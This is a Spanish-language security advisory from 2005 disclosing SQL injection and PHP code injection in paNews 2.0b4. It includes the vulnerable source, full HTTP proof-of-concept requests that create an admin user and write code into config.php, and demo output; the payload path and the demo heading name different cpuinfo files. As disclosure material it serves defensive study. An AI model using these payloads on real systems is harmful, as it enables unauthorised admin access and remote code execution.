=====================================================
paNews 2.0b4: SQL Injection and remote code execution
=====================================================
FraMe - frame at kernelpanik.org
http://www.kernelpanik.org
=====================================================

paNews es un script ligero para la gestión de contenido
web, principalmente noticias, y weblogs. Usa como sistema
de backend MySQL y en su versión 2.0 ha sido "re-escrito"
según aseguran sus autores para eliminar problemas de 
seguridad. 

paNews permite la inyección de código SQL gracias al uso
de "extract($_GET)" y "extract($_POST)" los cuales son llamados
sin ningún control a lo largo del código permitiendo re-escribir
los valores legítimos de la aplicación, por los nuestros propios.

Haciendo uso de esta vulnerabilidad es posible insertar
nuestro propio usuario en paNews, y a partir de aquí conseguir
injección de código, usando variables no saneadas, en la escritura 
a disco del fichero de configuración "config.php". 

=== Inyección de SQL en el método login();
=== fichero: ./includes/auth.php

<?
(..)
function login() {
global $error,$mysql_prefix,$_COOKIE,$_SESSION,$_LOGIN,$_GET,
$_POST,$myip,$authtype;
			
extract ($_GET);
extract ($_POST);
							
$username = strtolower($username);
$password = strtolower($password);

$query = mysql_query("SELECT * FROM `".$mysql_prefix."_auth`");

if (mysql_num_rows($query) == 0) {
    $pass2 = MD5($password);
    mysql_query("INSERT INTO `".$mysql_prefix."_auth` 
    		  VALUES ('','$username','$pass2','',
		  'admins|cat|comment|newsadd|newsedit|prefset|setup',
		  '','$myip',UNIX_TIMESTAMP(),UNIX_TIMESTAMP())");
(..)
?>

El uso de "extract" permite adulterar la variable $mysql_prefix lo cual
hace posible insertar un nuevo usuario en el sistema con privilegios
administrativos.

==== Proof of concept para el método login();

POST http://localhost/panews/index.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Referer: http://localhost/panews/index.php
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
Keep-Alive: 300

action=login&username=frame&password=amo&mysql_prefix=panews_auth` VALUES ("","frame","d41d8cd98f00b204e9800998ecf8427e","hackit","admins|cat|comment|newsadd|newsedit|prefset|setup","none","127.0.0.1",1,1)%00

==== Inyección de código PHP en el admin_setup.php
==== fichero: ./includes/admin_setup.php

if ($do == "updatesets") {
        $lang = $form[lang];
	$comments = $form[comments];
	$autoapprove = $form[autoapprove];
			
	$content = "(..)"
	. "\$comments = $comments;\r\n"
	. "\$autoapprove = $autoapprove;\r\n"
	. "\$showcopy = $showcopy;\r\n"
	. "\$lang = \"$lang\";\r\n"
	. "(..)";
	
        $config = fopen ("./config.php", "w");
	$contents2 = fwrite ($config, $content) || $error = $lng["cantupdate"];
	fclose ($config);
(..)
?>

Entre otros los parámetros $comments o $autapprove, no sufren ningún tipo de chequeo,
pudiendo ser adulterados y permitiendo la inyección de código PHP en el fichero 
"./config.php"

Esta vulnerabilidad permite ser explotada de al menos dos formas, según en el entorno
en el que nos encontremos, en la demostración del concepto sólo será mostrada la más
genérica, y que necesita de un usuario autorizado en el sistema ^^

==== Proof of concept para admin_setup.php

GET http://hawking/panews/index.php?action=admin&op=setup&form[lang]=english&form[comments]=1&form[autoapprove]=1;%20?%3E%20%3C?%20include(%22/var/cpuinfo%22);%20?%3E%20%3C?%20$trivial=1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: hawking
Referer: http://hawking/panews/index.php
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Cookie: panews=%BF%3F%BF%3F0%BF%3F1108908178%BF%3F%BF%3Fframe%BF%3F0; IS_PANEWS=1
Keep-Alive: 300

==== Demo: Ejecución de "include /proc/cpuinfo" 

$ links -dump http://localhost/panews/
processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 13 model
name : Intel(R) Pentium(R) M processor 1.60GHz stepping : 6 cpu MHz :
598.614 cache size : 2048 KB fdiv_bug : no hlt_bug : no f00f_bug : no
coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags
: fpu vme de pse tsc msr mce cx8 mtrr pge mca cmov pat clflush dts acpi
mmx fxsr sse sse2 ss tm pbe est tm2 bogomips : 1182.72
		  
                       Please Login
                 Username [1]_____________________
                 Password [2]_____________________
            		[ Login ]

    		paNews 2.0b4 (c) 2003 phpArena

==== Línea de publicación

No hay línea de publicación.

==== Nota final

register_globals puesto a "off" no elimina esta vulnerabilidad.

================================
FraMe - frame at kernelpanik.org
http://www.kernelpanik.org
2005 (C) Kernelpanik Labs
================================